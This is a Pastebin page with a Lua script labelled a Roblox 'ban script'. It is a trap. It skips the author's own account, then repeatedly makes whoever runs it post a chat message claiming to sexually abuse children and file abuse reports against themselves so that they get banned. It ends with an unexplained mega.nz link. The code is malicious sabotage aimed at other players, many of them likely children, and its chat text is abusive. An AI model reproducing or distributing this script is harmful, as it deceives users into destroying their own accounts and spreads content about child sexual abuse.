JustAPlayer

ROBLOX GAME BAN SCRIPT

Jul 19th, 2022 (edited)
230
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.96 KB | None | 0 0
  1. local l__LocalPlayer__1 = game.Players.LocalPlayer;
  2. if game:GetService("Players").LocalPlayer.UserId == **your profile id** then
  3.     error("You are verified");
  4. end;
  5. while true do
  6.     l__LocalPlayer__1.PlayerGui.Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.Frame.ChatBar:CaptureFocus();
  7.     l__LocalPlayer__1.PlayerGui.Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.Frame.ChatBar.Text = "I rape children";
  8.     l__LocalPlayer__1.PlayerGui.Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.Frame.ChatBar:ReleaseFocus(true);
  9.     wait(0.1);
  10. end;
  11.  
  12. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13.  
  14. while wait() do
  15. game.Players:ReportAbuse(game.Players.LocalPlayer,"Swearing", "claiming to rape children")
  16. end
  17.  
  18.  
  19.  
  20. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  21.  
  22.  
  23.  
  24. https://mega.nz/folder/iuRxkIbS#qZlsG2mH_-aofuCs6Wys-A
Add Comment
Please, Sign In to add comment